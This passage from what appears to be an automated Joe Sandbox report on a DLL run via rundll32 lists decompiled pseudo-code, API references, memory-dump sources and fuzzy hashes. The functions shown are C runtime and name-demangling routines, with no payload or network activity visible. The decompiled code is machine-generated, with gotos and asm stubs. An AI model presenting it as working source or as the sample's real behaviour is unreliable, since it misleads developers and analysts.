									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t270 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t265 = _t265 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t249 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t249 + _v48 + 0x2d) = _t265;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E1002C39D();
							_t288 = _t287 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t286;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100037EA(_a4, _v8 ^ _t286, _t265);
			}

0x10032668
0x1003266f
0x10032672
0x1003267a
0x1003267d
0x1003268a
0x1003268d
0x10032690
0x10032697
0x1003269f
0x100326a2
0x100326a5
0x100326ab
0x100326ad
0x100326b4
0x100326be
0x100326c0
0x100326c3
0x100326c6
0x100326c9
0x100326cc
0x100326cf
0x100326d5
0x100329e0
0x100329e0
0x00000000
0x100326db
0x100326e3
0x100326e6
0x100326ec
0x100326ef
0x100326f6
0x100326fd
0x10032700
0x00000000
0x00000000
0x10032709
0x1003270e
0x10032710
0x10032713
0x10032718
0x1003271c
0x00000000
0x00000000
0x00000000
0x1003271c
0x10032721
0x10032723
0x10032728
0x100327e2
0x100327e9
0x100327ea
0x100327ed
0x100327ef
0x10032993
0x10032995
0x00000000
0x10032997
0x10032997
0x1003299a
0x100329a9
0x100329ad
0x100329ae
0x100329ae
0x00000000
0x100329b2
0x100327f5
0x100327f7
0x100327fd
0x10032800
0x1003280c
0x10032815
0x10032820
0x10032825
0x10032828
0x1003282b
0x00000000
0x10032831
0x10032831
0x00000000
0x10032831
0x1003282b
0x1003272e
0x1003273d
0x1003273e
0x10032741
0x10032744
0x10032749
0x1003295f
0x10032961
0x10032963
0x10032965
0x1003296f
0x10032977
0x10032979
0x1003297a
0x1003297e
0x10032981
0x10032981
0x10032985
0x10032985
0x10032985
0x10032988
0x10032988
0x10032988
0x1003298a
0x1003298a
0x1003298e
0x1003274f
0x1003274f
0x10032752
0x10032754
0x10032757
0x1003275a
0x1003275e
0x1003275f
0x10032763
0x10032766
0x1003276b
0x10032775
0x1003277a
0x1003277d
0x10032780
0x10032780
0x10032783
0x10032786
0x10032788
0x10032791
0x10032795
0x10032796
0x1003279a
0x100327a0
0x100327a9
0x100327b6
0x100327bd
0x100327c1
0x100327cc
0x100327d1
0x100327d7
0x00000000
0x100327dd
0x10032834
0x10032835
0x100328b8
0x100328bf
0x100328c7
0x100328cf
0x100328d4
0x100328d7
0x100328dc
0x00000000
0x100328e2
0x100328f7
0x100329d7
0x100329dd
0x00000000
0x100328fd
0x10032906
0x10032908
0x1003290e
0x00000000
0x10032914
0x10032918
0x1003294e
0x10032951
0x00000000
0x10032957
0x10032957
0x00000000
0x10032957
0x1003291a
0x1003291c
0x1003291e
0x10032937
0x00000000
0x1003293d
0x10032941
0x00000000
0x10032947
0x10032947
0x1003294a
0x1003294b
0x00000000
0x1003294b
0x10032941
0x10032937
0x10032918
0x1003290e
0x100328f7
0x100328dc
0x100327d7
0x10032749
0x00000000
0x10032839
0x10032839
0x1003283d
0x10032840
0x10032862
0x10032865
0x1003286a
0x1003286e
0x10032872
0x100328a0
0x100328a2
0x00000000
0x10032874
0x10032874
0x10032874
0x10032877
0x1003287a
0x1003287d
0x100329b4
0x100329b7
0x100329c4
0x100329cf
0x100329d4
0x00000000
0x10032883
0x1003288a
0x1003288f
0x10032892
0x10032895
0x00000000
0x1003289b
0x1003289b
0x00000000
0x1003289b
0x10032895
0x1003287d
0x10032842
0x10032846
0x10032849
0x1003284e
0x10032854
0x10032856
0x1003285d
0x100328a3
0x100328a6
0x100328a7
0x100328ac
0x100328af
0x100328b2
0x00000000
0x00000000
0x00000000
0x00000000
0x100328b2
0x00000000
0x10032840
0x100326db
0x100329e3
0x100329e3
0x100329e5
0x100329e8
0x100329e8
0x100329e8
0x100329e8
0x100329fa
0x100329fc
0x100329fd
0x100329fe
0x10032a08

APIs

GetConsoleOutputCP.KERNEL32 ref: 100326A5
__fassign.LIBCMT ref: 1003288A
__fassign.LIBCMT ref: 100328A7
WriteFile.KERNEL32(?,1002B316,00000000,?,00000000), ref: 100328EF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1003292F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 100329D7

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction ID: a8bb8432d5e3edc8eb75f8d90f54bae1a245339a155dc0d31e03c7975ac7510e
Opcode Fuzzy Hash: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction Fuzzy Hash: 91C1AC75D052988FDB12CFA8C980AEDBBF5EF09314F29416AE855FB341D631AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CDCE, Relevance: 9.1, APIs: 6, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CDCE(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x1004e004; // 0x0
					if( *_t29 == 0) {
						E100076A6(E100072DE( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E10009A99( &_v12);
						_t65 = E100076A6(E100076C8( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x1004e004; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x1004e004 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E10007748(_t75,  &_v12);
									_t67 =  *((intOrPtr*)(_t75 + 4));
									_t39 =  *0x1004e004; // 0x0
									while(_t67 <= 1) {
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E100078B0(_t75, 1);
											}
											E100077F7(_t75, 0x7d);
											_t39 =  *0x1004e004; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E10007637(_t67,  &_v20, 0x60, E1000B7FB(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E100077A0(_t75, E100076C8(_t48,  &_v36, 0x27));
												_t39 =  *0x1004e004; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x1004e004 = _t39;
												}
												_t67 =  *((intOrPtr*)(_t75 + 4));
												if(_t67 <= 1) {
													if( *_t39 == 0x40) {
														continue;
													} else {
														_v12 = "s ";
														_v8 = 2;
														goto L5;
													}
													goto L21;
												}
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

0x1000cdd1
0x1000cdd4
0x1000cddb
0x1000cde1
0x1000cde3
0x1000cde6
0x1000cdeb
0x1000cdf1
0x1000cdf9
0x1000cf0e
0x1000cf16
0x1000cf1b
0x1000cdff
0x1000ce03
0x1000ce23
0x1000ce27
0x1000ce29
0x1000ce2c
0x1000ce31
0x1000ce37
0x1000ce3f
0x1000cef6
0x1000cef7
0x1000ce45
0x1000ce45
0x1000ce4c
0x1000ce53
0x1000ce53
0x1000ce59
0x1000ce5e
0x1000ce61
0x1000ce66
0x1000ce6e
0x1000ce72
0x1000ced6
0x1000ced9
0x1000cede
0x1000cede
0x1000cee7
0x1000ceec
0x1000ce74
0x1000ce77
0x1000ced4
0x00000000
0x00000000
0x1000ce79
0x1000ce89
0x1000ce8e
0x1000cea1
0x1000cea6
0x1000ceae
0x1000ceb0
0x1000ceb1
0x1000ceb1
0x1000ceb6
0x1000cebb
0x1000cec0
0x00000000
0x1000cec2
0x1000cec2
0x1000cec9
0x00000000
0x1000cec9
0x00000000
0x1000cec0
0x1000cebb
0x1000ce77
0x00000000
0x1000ce72
0x1000cef4
0x00000000
0x00000000
0x00000000
0x1000cef4
0x1000ce53
0x1000ce3f
0x1000ce31
0x1000cdf9
0x1000cf1e
0x1000cf23

APIs

DName::operator+.LIBCMT ref: 1000CE12
DName::operator+.LIBCMT ref: 1000CE1E

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+=.LIBCMT ref: 1000CEDE

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 1000CE99

Part of subcall function 100077A0: DName::operator=.LIBVCRUNTIME ref: 100077C1

DName::DName.LIBVCRUNTIME ref: 1000CF02
DName::operator+.LIBCMT ref: 1000CF0E

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction ID: 2463ad79b5e98d84085c04d8798126b1c143ff2480c819560cb4cfdd011bf85e
Opcode Fuzzy Hash: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction Fuzzy Hash: BD41E6B4A04388AFFB10CFA8C995FAE7BEAEB05380F400058F58AE7295D7356D40C759

Uniqueness

Uniqueness Score: -1.00%

Function 1000BBAD, Relevance: 9.1, APIs: 6, Instructions: 95
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000BBAD(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				char _t39;
				intOrPtr _t40;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E1000CF24(__edx,  &_v12, 1, 0);
				_t40 =  *_t25;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x1004e004; // 0x0
				_t39 = 2;
				if(_t26 != 0) {
					L4:
					_t57 =  *_t27;
					if(_t57 != 0x40) {
						if(_t57 == 0) {
							_push(1);
							if(_t40 != 0) {
								_v12 = "::";
								_v8 = _t39;
								_t30 = E100076A6(E10007684(E100072DE( &_v36),  &_v28,  &_v12),  &_v20, _t60);
								 *_t60 =  *_t30;
								 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E10007596(_t60);
							}
						} else {
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *((char*)(_t60 + 4)) = _t39;
							 *_t60 = 0;
						}
						L11:
						return _t60;
					}
					L5:
					 *0x1004e004 = _t27 + 1;
					goto L11;
				}
				_t58 =  *_t27;
				if(_t58 == 0) {
					goto L4;
				}
				if(_t58 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t39;
					_t37 = E100076A6(E10007684(E1000B7FB(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
					_t40 =  *_t37;
					 *_t60 = _t40;
					 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x1004e004; // 0x0
					goto L4;
				}
			}

0x1000bbb8
0x1000bbc2
0x1000bbc4
0x1000bbc7
0x1000bbcf
0x1000bbd1
0x1000bbd3
0x1000bbda
0x1000bbdd
0x1000bbe2
0x1000bbe3
0x1000bc2e
0x1000bc2e
0x1000bc33
0x1000bc3f
0x1000bc4b
0x1000bc4f
0x1000bc5d
0x1000bc64
0x1000bc82
0x1000bc89
0x1000bc8e
0x1000bc51
0x1000bc53
0x1000bc53
0x1000bc41
0x1000bc41
0x1000bc44
0x1000bc47
0x1000bc47
0x1000bc92
0x1000bc97
0x1000bc97
0x1000bc35
0x1000bc36
0x00000000
0x1000bc36
0x1000bbe5
0x1000bbe9
0x00000000
0x00000000
0x1000bbee
0x00000000
0x1000bbf0
0x1000bbf3
0x1000bbfb
0x1000bc1a
0x1000bc1f
0x1000bc21
0x1000bc26
0x1000bc29
0x00000000
0x1000bc29

APIs

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

DName::operator=.LIBVCRUNTIME ref: 1000BC53

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

DName::operator+.LIBCMT ref: 1000BC0E
DName::operator+.LIBCMT ref: 1000BC1A
DName::DName.LIBVCRUNTIME ref: 1000BC67
DName::operator+.LIBCMT ref: 1000BC76
DName::operator+.LIBCMT ref: 1000BC82

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction ID: 27af3a92f5b1fd040e2588c0fddfed7d18473ac67e6e21bd44ed062d0c5557d9
Opcode Fuzzy Hash: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction Fuzzy Hash: C031DCB5A00605AFEB18CF98D991DEEBBF9EF59380F00445DE58BA7341DB35AA44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 10005A4B, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10005A4B(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1004d060 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E1000D892(_t13, __eflags,  *0x1004d060);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E1000D8CD(_t14, __eflags,  *0x1004d060, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10012164();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E1000D8CD(_t18, __eflags,  *0x1004d060, 0);
								} else {
									_t8 = E1000D8CD(_t18, __eflags,  *0x1004d060, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E10011FAC(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x10005a4b
0x10005a52
0x10005a65
0x10005a6c
0x10005a6e
0x10005a6f
0x10005a72
0x10005a8b
0x10005a8b
0x10005a74
0x10005a74
0x10005a76
0x10005a80
0x10005a87
0x10005a89
0x10005a90
0x10005a99
0x10005a9c
0x10005a9d
0x10005a9f
0x10005ab3
0x10005ab3
0x10005abc
0x10005aa1
0x10005aa8
0x10005aae
0x10005aaf
0x10005ab1
0x10005ac5
0x10005ac7
0x10005ac7
0x00000000
0x00000000
0x00000000
0x10005ab1
0x10005aca
0x00000000
0x00000000
0x00000000
0x10005a89
0x10005a76
0x10005ad2
0x10005adc
0x10005a54
0x10005a56
0x10005a56

APIs

GetLastError.KERNEL32(00000001,?,1000526E,10003561,10003963,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D), ref: 10005A59
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10005A67
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005A80
SetLastError.KERNEL32(00000000,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D,?,00000001,?), ref: 10005AD2

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction ID: 7db28cdefa02e9f84fa3800d6371fd0a77151277f221630a79e8ae18b089995f
Opcode Fuzzy Hash: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction Fuzzy Hash: 53012436349322AEF714F7B06CC5A1B3B84EB036F2B20033BF510860E9EF229C119665

Uniqueness

Uniqueness Score: -1.00%

Function 10038FA4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10038FA4(void* __ebx, signed short* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t17;
				signed int _t26;
				char* _t31;
				signed short* _t34;
				void* _t35;
				void* _t36;
				signed int _t39;
				signed int _t42;

				_t35 = __esi;
				_t34 = __edx;
				_t39 = _t42;
				if(E1003B6E1(3) == 1 || __eax == 0 &&  *0x1004e888 == 1) {
					_pop(_t39);
					_push(_t39);
					_t40 = _t42;
					_t17 =  *0x1004d054; // 0x944e5696
					_v8 = _t17 ^ _t42;
					_push(_t35);
					_t36 = GetStdHandle(0xfffffff4);
					if(_t36 != 0 && _t36 != 0xffffffff) {
						_t34 = _v0;
						_t31 =  &_v512;
						while(1) {
							 *_t31 =  *_t34;
							_t31 = _t31 + 1;
							if(_t31 ==  &_v12) {
								break;
							}
							_t26 =  *_t34 & 0x0000ffff;
							_t34 =  &(_t34[1]);
							if(_t26 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						_t19 = WriteFile(_t36,  &_v512, _t31 -  &_v512 - 1,  &_v516, 0);
					}
					return E100037EA(_t19, _v12 ^ _t40, _t34);
				} else {
					_push(__esi);
					__eax = E10028A30(0x1004e890, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						__eax = E1000E341();
						asm("int3");
						__eax =  *0x1004e888; // 0x0
						return __eax;
					} else {
						_push(__edi);
						__esi = 0x1004e8c2;
						 *0x1004eaca = __ax;
						__eax = GetModuleFileNameW(0, 0x1004e8c2, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E10028A30(0x1004e8c2, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x1004e8c4
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x1004e8c1
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								__edi = 0x314;
								__esi = 0x1004e890;
								if(E1002F999(0x1004e890, 0x314, L"\n\n") != 0) {
									goto L21;
								} else {
									__eax = E1002F999(0x1004e890, 0x314, _a4);
									_pop(__edi);
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E1003B8C9(__ecx, 0x1004e890);
										_pop(__esi);
										__ebx = 0x12010;
										_pop(__ebp);
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x1004e885
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x1004e8c2[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}

0x10038fa4
0x10038fa4
0x10038fa7
0x10038fb4
0x100390a8
0x10038f2b
0x10038f2c
0x10038f34
0x10038f3b
0x10038f3e
0x10038f47
0x10038f4b
0x10038f52
0x10038f55
0x10038f5b
0x10038f5d
0x10038f5f
0x10038f65
0x00000000
0x00000000
0x10038f67
0x10038f6a
0x10038f70
0x00000000
0x00000000
0x00000000
0x10038f70
0x10038f75
0x10038f78
0x10038f91
0x10038f91
0x10038fa3
0x10038fcb
0x10038fcc
0x10038fdc
0x10038fe4
0x10038fe8
0x100390ae
0x100390b3
0x100390b8
0x100390b9
0x100390be
0x10038fee
0x10038fee
0x10038ff4
0x10038ff9
0x10039001
0x10039007
0x1003900e
0x10039027
0x10039027
0x1003902a
0x1003902a
0x1003902d
0x10039030
0x10039035
0x10039037
0x10039039
0x10039039
0x1003903f
0x10039062
0x10039067
0x1003906c
0x1003907d
0x00000000
0x1003907f
0x10039084
0x1003908c
0x1003908f
0x00000000
0x10039091
0x10039096
0x1003909c
0x100390a4
0x100390a5
0x100390a6
0x100390a7
0x100390a7
0x1003908f
0x10039041
0x10039041
0x10039043
0x10039043
0x10039046
0x10039048
0x10039060
0x00000000
0x00000000
0x00000000
0x00000000
0x10039060
0x00000000
0x00000000
0x00000000
0x1003900e
0x10038fe8

APIs

GetModuleFileNameW.KERNEL32(00000000,1004E8C2,00000104), ref: 10039001

Strings

..., xrefs: 1003904F
Microsoft Visual C++ Runtime Library, xrefs: 10039096
Runtime Error!Program: , xrefs: 10038FCD
<program name unknown>, xrefs: 10039010

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction ID: afe29cdb41c4ee65c3bb8b902ab9bfe68787d4c676a15ac55f3717a69dda071b
Opcode Fuzzy Hash: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction Fuzzy Hash: E0216B76E003863EE326D2209C85E9B278CCF823C6F510439FD08DA142FB62DE05C1E9

Uniqueness

Uniqueness Score: -1.00%

Function 10027AD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027AD5(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E10028BDD(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E10028BDD(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E10027C17(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E10024468(GetLastError());
						_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E10027C17(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E10027C59(_a8);
				return 0;
			}

0x10027adb
0x10027ae0
0x10027af4
0x10027af7
0x10027b29
0x10027b31
0x10027b33
0x10027b4c
0x10027b4f
0x10027b52
0x10027b60
0x10027b6f
0x10027b77
0x10027b79
0x10027b92
0x10027b95
0x10027b95
0x10027b7b
0x10027b82
0x10027b8d
0x10027b8d
0x10027b97
0x10027b98
0x00000000
0x10027b98
0x10027b57
0x10027b5c
0x10027b5e
0x00000000
0x00000000
0x00000000
0x10027b5e
0x10027b3c
0x10027b47
0x00000000
0x10027b47
0x10027af9
0x10027afc
0x10027aff
0x10027b12
0x10027b15
0x10027b17
0x10027b19
0x00000000
0x10027b19
0x10027b05
0x10027b0a
0x10027b0c
0x00000000
0x00000000
0x00000000
0x10027b0c
0x10027ae5
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 10027ADA

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction ID: 57770cad2dc7d873b8782db2f193e3cd771f19afa728aead8fe90cc5b1cf633c
Opcode Fuzzy Hash: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction Fuzzy Hash: 06219F7560021ABFE721DF61AC81E5B77ACFF412A47A24924FA2C97151DB31FC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000144D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000144D(void* __ecx, void* __edx, struct HWND__* _a4, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* _t23;

				_t23 = __edx;
				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0) {
